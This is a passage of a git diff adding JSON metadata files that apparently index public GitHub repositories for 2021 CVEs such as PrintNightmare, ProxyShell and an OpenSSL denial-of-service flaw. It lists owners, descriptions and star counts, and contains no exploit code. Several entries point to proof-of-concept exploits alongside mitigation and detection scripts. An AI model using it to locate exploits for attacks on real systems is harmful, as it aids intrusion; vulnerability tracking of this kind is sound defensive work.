"created_at": "2021-08-11T16:56:10Z", + "updated_at": "2023-05-12T09:43:59Z", + "pushed_at": "2021-08-11T17:01:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34486.json b/2021/CVE-2021-34486.json new file mode 100644 index 0000000000..9546c40fa3 --- /dev/null +++ b/2021/CVE-2021-34486.json @@ -0,0 +1,64 @@ +[ + { + "id": 416174012, + "name": "CVE-2021-34486", + "full_name": "KaLendsi\/CVE-2021-34486", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-34486", + "description": "Windows Etw LPE", + "fork": false, + "created_at": "2021-10-12T03:50:44Z", + "updated_at": "2024-10-29T15:51:49Z", + "pushed_at": "2021-10-12T05:52:00Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 50, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 421793459, + "name": "CVE-2021-34486-exp", + "full_name": "b1tg\/CVE-2021-34486-exp", + "owner": { + "login": "b1tg", + "id": 33436708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33436708?v=4", + "html_url": "https:\/\/github.com\/b1tg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1tg\/CVE-2021-34486-exp", + "description": null, + "fork": false, + "created_at": "2021-10-27T11:39:08Z", + "updated_at": "2021-10-27T11:39:31Z", + "pushed_at": "2021-10-27T11:39:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3449.json b/2021/CVE-2021-3449.json new file mode 100644 index 0000000000..3654a3cdb6 --- /dev/null +++ b/2021/CVE-2021-3449.json @@ -0,0 +1,39 @@ +[ + { + "id": 351622243, + "name": "cve-2021-3449", + "full_name": "riptl\/cve-2021-3449", + "owner": { + "login": "riptl", + "id": 21371810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21371810?v=4", + "html_url": "https:\/\/github.com\/riptl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riptl\/cve-2021-3449", + "description": "CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻", + "fork": false, + "created_at": "2021-03-26T01:09:25Z", + "updated_at": "2024-11-23T01:54:09Z", + "pushed_at": "2021-08-25T01:00:49Z", + "stargazers_count": 224, + "watchers_count": 224, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3449", + "denial-of-service", + "exploit", + "openssl", + "tls" + ], + "visibility": "public", + "forks": 42, + "watchers": 224, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34496.json b/2021/CVE-2021-34496.json new file mode 100644 index 0000000000..d35526beb3 --- /dev/null +++ b/2021/CVE-2021-34496.json @@ -0,0 +1,33 @@ +[ + { + "id": 386161559, + "name": "CVE-2021-34496", + "full_name": "dja2TaqkGEEfA45\/CVE-2021-34496", + "owner": { + "login": "dja2TaqkGEEfA45", + "id": 82131630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-34496", + "description": null, + "fork": false, + "created_at": "2021-07-15T04:23:58Z", + "updated_at": "2021-07-15T04:23:58Z", + "pushed_at": "2021-07-15T04:23:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34523.json b/2021/CVE-2021-34523.json new file mode 100644 index 0000000000..81ebe3c305 --- /dev/null +++ b/2021/CVE-2021-34523.json @@ -0,0 +1,64 @@ +[ + { + "id": 412723954, + "name": "ProxyShell_POC", + "full_name": "mithridates1313\/ProxyShell_POC", + "owner": { + "login": "mithridates1313", + "id": 84065796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84065796?v=4", + "html_url": "https:\/\/github.com\/mithridates1313", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mithridates1313\/ProxyShell_POC", + "description": "POC for scanning ProxyShell(CVE-2021-34523,CVE-2021-34473,CVE-2021-31207)", + "fork": false, + "created_at": "2021-10-02T07:29:24Z", + "updated_at": "2024-08-12T20:16:53Z", + "pushed_at": "2021-10-06T11:35:20Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 686328822, + "name": "CVE-2021-34523", + "full_name": "SUPRAAA-1337\/CVE-2021-34523", + "owner": { + "login": "SUPRAAA-1337", + "id": 128395905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4", + "html_url": "https:\/\/github.com\/SUPRAAA-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2021-34523", + "description": "test-yaml", + "fork": false, + "created_at": "2023-09-02T12:26:18Z", + "updated_at": "2024-03-18T17:53:18Z", + "pushed_at": "2023-09-02T21:18:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34527.json b/2021/CVE-2021-34527.json new file mode 100644 index 0000000000..e7a6798eb0 --- /dev/null +++ b/2021/CVE-2021-34527.json @@ -0,0 +1,781 @@ +[ + { + "id": 382021281, + "name": "CVE-2021-34527", + "full_name": "DenizSe\/CVE-2021-34527", + "owner": { + "login": "DenizSe", + "id": 43039427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43039427?v=4", + "html_url": "https:\/\/github.com\/DenizSe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DenizSe\/CVE-2021-34527", + "description": "Small Powershell Script to detect Running Printer Spoolers on Domain Controller", + "fork": false, + "created_at": "2021-07-01T12:12:16Z", + "updated_at": "2021-07-02T07:49:06Z", + "pushed_at": "2021-07-02T07:45:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1675", + "cve-2021-34527", + "domaincontroller", + "printnightmare", + "printspooler" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382267064, + "name": "PrintNightmare", + "full_name": "thomas-lauer\/PrintNightmare", + "owner": { + "login": "thomas-lauer", + "id": 7205231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7205231?v=4", + "html_url": "https:\/\/github.com\/thomas-lauer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-lauer\/PrintNightmare", + "description": "Kritische Sicherheitslücke PrintNightmare CVE-2021-34527", + "fork": false, + "created_at": "2021-07-02T07:30:52Z", + "updated_at": "2024-08-12T20:14:24Z", + "pushed_at": "2021-07-12T15:07:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382335385, + "name": "CVE-2021-34527", + "full_name": "JohnHammond\/CVE-2021-34527", + "owner": { + "login": "JohnHammond", + "id": 6288722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4", + "html_url": "https:\/\/github.com\/JohnHammond", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2021-34527", + "description": null, + "fork": false, + "created_at": "2021-07-02T12:10:49Z", + "updated_at": "2024-11-21T15:29:00Z", + "pushed_at": "2021-07-02T12:17:50Z", + "stargazers_count": 259, + "watchers_count": 259, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 66, + "watchers": 259, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 382645654, + "name": "PrintNightmare-CVE-2021-34527", + "full_name": "nemo-wq\/PrintNightmare-CVE-2021-34527", + "owner": { + "login": "nemo-wq", + "id": 28733668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28733668?v=4", + "html_url": "https:\/\/github.com\/nemo-wq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nemo-wq\/PrintNightmare-CVE-2021-34527", + "description": "PrintNightmare - Windows Print Spooler RCE\/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits", + "fork": false, + "created_at": "2021-07-03T15:15:12Z", + "updated_at": "2024-11-24T22:08:47Z", + "pushed_at": "2021-09-13T12:12:17Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-1675", + "cve-2021-34527", + "howto-tutorial", + "printnightmare", + "rce", + "windowsexploits" + ], + "visibility": "public", + "forks": 39, + "watchers": 123, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 382894525, + "name": "CVE-2021-34527-1675", + "full_name": "CnOxx1\/CVE-2021-34527-1675", + "owner": { + "login": "CnOxx1", + "id": 86923954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86923954?v=4", + "html_url": "https:\/\/github.com\/CnOxx1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CnOxx1\/CVE-2021-34527-1675", + "description": "Cve-2021-1675 or cve-2021-34527? Detailed analysis and exploitation of windows print spooler 0day vulnerability!!!", + "fork": false, + "created_at": "2021-07-04T16:09:18Z", + "updated_at": "2021-09-06T06:08:09Z", + "pushed_at": "2021-07-04T16:31:21Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 383207766, + "name": "disable-RegisterSpoolerRemoteRpcEndPoint", + "full_name": "rdboboia\/disable-RegisterSpoolerRemoteRpcEndPoint", + "owner": { + "login": "rdboboia", + "id": 37208426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37208426?v=4", + "html_url": "https:\/\/github.com\/rdboboia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rdboboia\/disable-RegisterSpoolerRemoteRpcEndPoint", + "description": "Workaround for Windows Print Spooler Remote Code Execution Vulnerability(CVE-2021-34527). See: https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-34527", + "fork": false, + "created_at": "2021-07-05T16:49:32Z", + "updated_at": "2021-07-08T21:11:43Z", + "pushed_at": "2021-07-08T21:11:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 383223006, + "name": "CVE-2021-34527-PrintNightmare-Workaround", + "full_name": "geekbrett\/CVE-2021-34527-PrintNightmare-Workaround", + "owner": { + "login": "geekbrett", + "id": 22183376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22183376?v=4", + "html_url": "https:\/\/github.com\/geekbrett", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geekbrett\/CVE-2021-34527-PrintNightmare-Workaround", + "description": "This simple PowerShell script is in response to the \"PrintNightmare\" vulnerability. This was designed to give a end user the ability to stop and disable the \"Print Spooler\" service on their computer while awaiting a fix from Microsoft.", + "fork": false, + "created_at": "2021-07-05T17:50:56Z", + "updated_at": "2024-08-24T16:04:56Z", + "pushed_at": "2021-07-07T17:18:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 383254488, + "name": "ItWasAllADream", + "full_name": "byt3bl33d3r\/ItWasAllADream", + "owner": { + "login": "byt3bl33d3r", + "id": 5151193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5151193?v=4", + "html_url": "https:\/\/github.com\/byt3bl33d3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/byt3bl33d3r\/ItWasAllADream", + "description": "A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE", + "fork": false, + "created_at": "2021-07-05T20:13:49Z", + "updated_at": "2024-11-17T00:40:44Z", + "pushed_at": "2024-05-19T16:25:52Z", + "stargazers_count": 784, + "watchers_count": 784, + "has_discussions": false, + "forks_count": 121, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 121, + "watchers": 784, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 383699836, + "name": "Disable-Spooler-Service-PrintNightmare-CVE-2021-34527", + "full_name": "vinaysudheer\/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527", + "owner": { + "login": "vinaysudheer", + "id": 29897973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29897973?v=4", + "html_url": "https:\/\/github.com\/vinaysudheer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinaysudheer\/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527", + "description": "Simple batch script to disable the Microsoft Print Spooler service from system", + "fork": false, + "created_at": "2021-07-07T06:41:15Z", + "updated_at": "2021-07-07T06:47:16Z", + "pushed_at": "2021-07-07T06:47:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 383719689, + "name": "PrintNightmare-CVE-2021-34527", + "full_name": "powershellpr0mpt\/PrintNightmare-CVE-2021-34527", + "owner": { + "login": "powershellpr0mpt", + "id": 9294993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9294993?v=4", + "html_url": "https:\/\/github.com\/powershellpr0mpt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/powershellpr0mpt\/PrintNightmare-CVE-2021-34527", + "description": "How to fix the PrintNightmare vulnerability", + "fork": false, + "created_at": "2021-07-07T07:58:53Z", + "updated_at": "2024-08-24T16:05:17Z", + "pushed_at": "2021-07-07T10:00:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 383968301, + "name": "CVE-2021-34527_ACL_mitigation", + "full_name": "WidespreadPandemic\/CVE-2021-34527_ACL_mitigation", + "owner": { + "login": "WidespreadPandemic", + "id": 75406207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75406207?v=4", + "html_url": "https:\/\/github.com\/WidespreadPandemic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WidespreadPandemic\/CVE-2021-34527_ACL_mitigation", + "description": "Mitigation for CVE-2021-34527 RCE by setting WRITE ACLs", + "fork": false, + "created_at": "2021-07-08T01:32:18Z", + "updated_at": "2021-07-09T03:54:14Z", + "pushed_at": "2021-07-09T03:54:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384221697, + "name": "printnightmare", + "full_name": "glorisonlai\/printnightmare", + "owner": { + "login": "glorisonlai", + "id": 26339805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26339805?v=4", + "html_url": "https:\/\/github.com\/glorisonlai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glorisonlai\/printnightmare", + "description": "CVE-2021-34527 implementation", + "fork": false, + "created_at": "2021-07-08T18:56:04Z", + "updated_at": "2021-07-08T18:56:07Z", + "pushed_at": "2021-07-08T18:56:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384372251, + "name": "CVE-2021-34527-Scanner-Based-On-cube0x0-POC", + "full_name": "dywhoami\/CVE-2021-34527-Scanner-Based-On-cube0x0-POC", + "owner": { + "login": "dywhoami", + "id": 87174410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87174410?v=4", + "html_url": "https:\/\/github.com\/dywhoami", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dywhoami\/CVE-2021-34527-Scanner-Based-On-cube0x0-POC", + "description": null, + "fork": false, + "created_at": "2021-07-09T08:27:36Z", + "updated_at": "2024-01-30T02:03:36Z", + "pushed_at": "2021-07-11T00:23:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384385967, + "name": "Printnightmare", + "full_name": "Eutectico\/Printnightmare", + "owner": { + "login": "Eutectico", + "id": 30925137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30925137?v=4", + "html_url": "https:\/\/github.com\/Eutectico", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eutectico\/Printnightmare", + "description": "Fix for PrintNightmare CVE-2021-34527", + "fork": false, + "created_at": "2021-07-09T09:22:03Z", + "updated_at": "2021-07-09T11:02:54Z", + "pushed_at": "2021-07-09T11:02:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 384554464, + "name": "PowerShell-PrintNightmare", + "full_name": "syntaxbearror\/PowerShell-PrintNightmare", + "owner": { + "login": "syntaxbearror", + "id": 53105897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53105897?v=4", + "html_url": "https:\/\/github.com\/syntaxbearror", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/syntaxbearror\/PowerShell-PrintNightmare", + "description": "A collection of scripts to help set the appropriate registry keys for CVE-2021-34527", + "fork": false, + "created_at": "2021-07-09T21:28:16Z", + "updated_at": "2021-07-11T16:21:00Z", + "pushed_at": "2021-07-09T21:46:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 385271497, + "name": "PrintNightmare-Patcher", + "full_name": "0xirison\/PrintNightmare-Patcher", + "owner": { + "login": "0xirison", + "id": 87223944, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87223944?v=4", + "html_url": "https:\/\/github.com\/0xirison", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xirison\/PrintNightmare-Patcher", + "description": "A patch for PrintNightmare vulnerability that occurs to print spooler service for Windows machines [CVE-2021-34527]", + "fork": false, + "created_at": "2021-07-12T14:14:29Z", + "updated_at": "2024-08-24T16:05:05Z", + "pushed_at": "2021-07-23T05:03:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-34527", + "printnightmare", + "python3", + "security", + "security-tools", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390263988, + "name": "PrintNightmare", + "full_name": "Tomparte\/PrintNightmare", + "owner": { + "login": "Tomparte", + "id": 88080067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88080067?v=4", + "html_url": "https:\/\/github.com\/Tomparte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tomparte\/PrintNightmare", + "description": "To fight against Windows security breach PrintNightmare! (CVE-2021-34527, CVE-2021-1675)", + "fork": false, + "created_at": "2021-07-28T07:55:42Z", + "updated_at": "2023-08-01T13:42:52Z", + "pushed_at": "2021-08-20T11:41:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "batch-script", + "cve-2021-1675", + "cve-2021-34527", + "cve-2021-36958", + "cve-2021-40447", + "cybersecurity", + "powershell-script", + "print", + "printnightmare", + "security", + "spooler", + "to-do", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437822133, + "name": "CVE-2021-34527", + "full_name": "Amaranese\/CVE-2021-34527", + "owner": { + "login": "Amaranese", + "id": 32201849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32201849?v=4", + "html_url": "https:\/\/github.com\/Amaranese", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amaranese\/CVE-2021-34527", + "description": null, + "fork": false, + "created_at": "2021-12-13T10:04:49Z", + "updated_at": "2021-12-13T10:21:38Z", + "pushed_at": "2021-12-13T10:21:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 507019653, + "name": "CVE-2021-34527", + "full_name": "cyb3rpeace\/CVE-2021-34527", + "owner": { + "login": "cyb3rpeace", + "id": 108078112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108078112?v=4", + "html_url": "https:\/\/github.com\/cyb3rpeace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyb3rpeace\/CVE-2021-34527", + "description": null, + "fork": false, + "created_at": "2022-06-24T13:25:25Z", + "updated_at": "2024-03-06T16:11:56Z", + "pushed_at": "2022-06-24T13:25:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 528150029, + "name": "CVE-2021-34527", + "full_name": "m8sec\/CVE-2021-34527", + "owner": { + "login": "m8sec", + "id": 13889819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13889819?v=4", + "html_url": "https:\/\/github.com\/m8sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m8sec\/CVE-2021-34527", + "description": "PrintNightmare (CVE-2021-34527) PoC Exploit", + "fork": false, + "created_at": "2022-08-23T20:20:45Z", + "updated_at": "2024-11-21T14:55:56Z", + "pushed_at": "2022-12-17T16:10:46Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 107, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 533095208, + "name": "cve-2021-34527", + "full_name": "hackerhouse-opensource\/cve-2021-34527", + "owner": { + "login": "hackerhouse-opensource", + "id": 43967630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43967630?v=4", + "html_url": "https:\/\/github.com\/hackerhouse-opensource", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackerhouse-opensource\/cve-2021-34527", + "description": "CVE-2021-34527 AddPrinterDriverEx() Privilege Escalation", + "fork": false, + "created_at": "2022-09-05T23:48:44Z", + "updated_at": "2024-08-12T20:26:47Z", + "pushed_at": "2022-09-06T14:07:31Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 680787340, + "name": "CVE-2021-34527", + "full_name": "d0rb\/CVE-2021-34527", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2021-34527", + "description": "CVE-2021-34527 PrintNightmare PoC", + "fork": false, + "created_at": "2023-08-20T12:04:18Z", + "updated_at": "2023-08-20T12:06:06Z", + "pushed_at": "2023-08-20T12:18:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711103414, + "name": "detect_bruteforce", + "full_name": "TieuLong21Prosper\/detect_bruteforce", + "owner": { + "login": "TieuLong21Prosper", + "id": 128500598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128500598?v=4", + "html_url": "https:\/\/github.com\/TieuLong21Prosper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TieuLong21Prosper\/detect_bruteforce", + "description": "detect bruteforce using for cve-2021-34527", + "fork": false, + "created_at": "2023-10-28T08:16:36Z", + "updated_at": "2023-10-28T08:20:15Z", + "pushed_at": "2023-10-28T08:20:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819687370, + "name": "CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784", + "full_name": "Hirusha-N\/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784", + "owner": { + "login": "Hirusha-N", + "id": 76760906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76760906?v=4", + "html_url": "https:\/\/github.com\/Hirusha-N", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hirusha-N\/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784", + "description": null, + "fork": false, + "created_at": "2024-06-25T02:30:31Z", + "updated_at": "2024-06-25T02:32:40Z", + "pushed_at": "2024-06-25T02:32:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34558.json b/2021/CVE-2021-34558.json new file mode 100644 index 0000000000..476f0cc4f2 --- /dev/null +++ b/2021/CVE-2021-34558.json @@ -0,0 +1,33 @@ +[ + { + "id": 385496417, + "name": "cve-2021-34558", + "full_name": "alexzorin\/cve-2021-34558", + "owner": { + "login": "alexzorin", + "id": 311534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/311534?v=4", + "html_url": "https:\/\/github.com\/alexzorin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexzorin\/cve-2021-34558", + "description": null, + "fork": false, + "created_at": "2021-07-13T06:15:21Z", + "updated_at": "2023-12-11T06:17:36Z", + "pushed_at": "2021-07-13T06:16:11Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-34600.json b/2021/CVE-2021-34600.json new file mode 100644 